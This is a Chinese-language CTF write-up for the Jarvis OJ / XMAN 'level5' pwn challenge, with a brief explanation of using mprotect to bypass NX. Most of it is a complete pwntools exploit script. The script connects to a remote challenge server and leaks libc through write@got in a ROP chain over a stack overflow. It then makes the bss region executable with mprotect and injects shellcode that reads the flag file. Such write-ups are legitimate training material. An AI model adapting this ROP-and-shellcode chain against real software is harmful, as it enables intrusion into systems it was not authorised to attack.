[XMAN]level5
阿新 • • 發佈:2021-07-17
mmap和mprotect練習,假設system和execve函式被禁用,請嘗試使用mmap和mprotect完成本題。
nc pwn2.jarvisoj.com 9884
附件同level3_x64
mmap可以將檔案或其他物件對映到記憶體中,mprotect可以改變某段地址的許可權(rwx)
程式開啟了NX保護,因此可以考慮用mprotect將一段bss段或data段設定成rwx許可權然後寫入shellcode並執行
exp如下:
from pwn import * #io = process('./level3_x64') io = remote('pwn2.jarvisoj.com', 9884) elf = ELF('./level3_x64') #libc = elf.libc libc = ELF('./libc-2.19.so') context.arch = 'amd64' context.os = 'linux' #context.log_level = 'debug' pop_rdi = 0x4006b3 pop_rsi_r15 = 0x4006b1 write_plt = 0x4004B0 write_got = 0x600A58 read_plt = 0x4004C0 vuln_addr = 0x4005E6 payload = b'a' * 136 + p64(pop_rdi) + p64(1) + p64(pop_rsi_r15) + p64(write_got) payload+= p64(0) + p64(write_plt) + p64(vuln_addr) io.recvuntil('Input:\n') io.send(payload) write_addr = u64(io.recv(8)) info("write_addr:" + str(hex(write_addr))) libc_base = write_addr - libc.symbols['write'] info("libc_base:" + str(hex(libc_base))) pop_rsi = 0x24885 + libc_base info("pop_rsi:" + str(hex(pop_rsi))) pop_rdx= 0x286 + libc_base info("pop_rdx:" + str(hex(pop_rdx))) mprotect_addr = libc_base + libc.symbols['mprotect'] info("mprotect_addr:" + str(hex(mprotect_addr))) payload = b'a' * 136 + p64(pop_rdi) + p64(0x600000) + p64(pop_rsi) + p64(0x1000) payload += p64(pop_rdx) + p64(7) + p64(mprotect_addr) + p64(vuln_addr) io.recvuntil('Input:\n') io.send(payload) shellcode = shellcraft.open('./flag') shellcode += shellcraft.read(3, 0x600500, 0x100) shellcode += shellcraft.write(1, 0x600500, 0x100) shellcode = asm(shellcode) payload = b'a' * 136 + p64(pop_rdi) + p64(0) + p64(pop_rsi) + p64(0x600000) payload += p64(pop_rdx) + p64(len(shellcode)) + p64(read_plt) + p64(0x600000) io.recvuntil('Input:\n') io.send(payload) sleep(0.5) io.send(shellcode) io.interactive()